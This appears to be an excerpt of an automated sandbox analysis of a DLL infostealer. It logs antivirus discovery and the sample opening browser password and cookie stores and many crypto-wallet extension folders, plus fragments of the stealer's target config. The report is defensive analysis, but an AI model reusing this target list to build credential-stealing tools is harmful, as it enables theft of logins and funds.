            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES83D5.tmp" "c:\Users\user\AppData\Local\Temp\pejlabp5\CSCDF701219C1C48818E6CA425D3E8BAB7.TMP"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9337.tmp" "c:\Users\user\AppData\Local\Temp\rcv5n2si\CSC2F361128F45F4F0A9752D6455878CB1F.TMP"
            Source: C:\Windows\System32\loaddll32.exe | Queries volume information: C:\Users\user\Desktop\iviewers.dll VolumeInformation
            Source: C:\Windows\System32\loaddll32.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\System32\loaddll32.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Windows\SysWOW64\regsvr32.exe | Queries volume information: C:\Users\user\Desktop\iviewers.dll VolumeInformation
            Source: C:\Windows\SysWOW64\regsvr32.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\SysWOW64\regsvr32.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information: C:\Users\user\Desktop\iviewers.dll VolumeInformation
            Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information: C:\Users\user\Desktop\iviewers.dll VolumeInformation
            Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: RegAsm.exe, 00000029.00000002.1806244051.0000000001090000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: RegAsm.exe, 00000023.00000002.1754899784.00000000011D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],"z":"Wal
            Source: RegAsm.exe, 00000023.00000002.1754899784.00000000011D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"
            Source: RegAsm.exe, 00000023.00000002.1754899784.00000000011D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0
            Source: RegAsm.exe, 00000023.00000002.1754899784.00000000011D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ppdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Versio0
            Source: RegAsm.exe, 00000023.00000002.1754899784.00000000011D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exod
            Source: RegAsm.exe, 00000023.00000002.1754899784.00000000011D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exod
            Source: RegAsm.exe, 00000023.00000002.1754899784.00000000011D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keysto
            Source: RegAsm.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
            Source: powershell.exe, 0000000D.00000002.1621451700.0000000007DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqlite
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.json
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
